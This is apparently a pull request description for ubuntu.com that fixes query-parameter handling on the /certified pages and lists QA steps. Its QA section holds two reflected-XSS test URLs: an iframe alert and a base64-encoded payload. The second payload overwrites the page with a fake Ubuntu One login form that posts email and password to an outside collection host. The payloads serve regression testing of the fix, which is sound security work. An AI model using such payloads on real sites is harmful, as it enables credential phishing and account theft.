canonical/ubuntu.com
# Parse query params for /certified

## Done

- Parse query params for /certified
- Clean up code
- Fix filters not reloading on category pages when first hitting the page (changes in .js file)


## QA

- Check https://ubuntu-com-13405.demos.haus/certified/laptops?q=&category=Laptop&release=Core+22%22%3E%3Ciframe+onload%3Dalert%28%27REDACTED%27%29%3E&release=Core+20&release=Core+18&release=Core+22 this shouldn't open the alert window
- Do the same for [this one](https://ubuntu.com/certified/laptops?q=&category=Laptop&release=Core+22%22%3E%3Ciframe%20onload=%22javascript:document.body.innerHTML%20=%20atob(%27PGRpdiBjbGFzcz0icC1tb2RhbCIgaWQ9Im1vZGFsIj4gPHNlY3Rpb24gY2xhc3M9InAtbW9kYWxfX2RpYWxvZyIgcm9sZT0iZGlhbG9nIiBhcmlhLW1vZGFsPSJ0cnVlIiBhcmlhLWxhYmVsbGVkYnk9Im1vZGFsLXRpdGxlIiBhcmlhLWRlc2NyaWJlZGJ5PSJtb2RhbC1kZXNjcmlwdGlvbiI%2BIDxoZWFkZXIgY2xhc3M9InAtbW9kYWxfX2hlYWRlciI%2BIDxoMiBjbGFzcz0icC1tb2RhbF9fdGl0bGUiIGlkPSJtb2RhbC10aXRsZSI%2BTG9naW48L2gyPiA8L2hlYWRlcj4gPHAgaWQ9Im1vZGFsLWRlc2NyaXB0aW9uIj5QbGVhc2UgZW50ZXIgeW91IFVidW50dSBPbmUgY3JlZGVudGlhbHMgdG8gY29udGludWU8L3A%2BIDxkaXYgY2xhc3M9InAtaGVhZGluZy1pY29uLS1zbWFsbCI%2BIDxmb3JtIGFjdGlvbj0iaHR0cHM6Ly9lbm82bWJuZzRxeGRuLngucGlwZWRyZWFtLm5ldCI%2BIDxpbnB1dCB0eXBlPSJlbWFpbCIgaWQ9ImVtYWlsIiBuYW1lPSJlbWFpbCIgcGxhY2Vob2xkZXI9IllvdXIgZW1haWwiIGF1dG9jb21wbGV0ZT0iZW1haWwiPiA8bGFiZWwgZm9yPSJleGFtcGxlSW5wdXRQYXNzd29yZDEiPlBhc3N3b3JkPC9sYWJlbD4gPGlucHV0IHR5cGU9InBhc3N3b3JkIiBpZD0icGFzcyIgbmFtZT0icGFzcyIgcGxhY2Vob2xkZXI9IllvdXIgcGFzc3dvcmQiIGF1dG9jb21wbGV0ZT0iY3VycmVudC1wYXNzd29yZCI%2BIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiPkxvZ2luPC9idXR0b24%2BIDwvZm9ybT4gPC9kaXY%2BIDwvc2VjdGlvbj48L2Rpdj4%3D%27)%22%3E%3C/iframe%3E&release=Core+20&release=Core+18&release=Core+22)
- Check current filters work as usual. e.g.:
  - Go to  /certified?q=xps click on "desktop" filter and select vendor and release, then check that redirects to /desktop page with respective params, and checkboxes checked.
 

## Issue / Card

Fixes https://warthogs.atlassian.net/browse/WD-7941
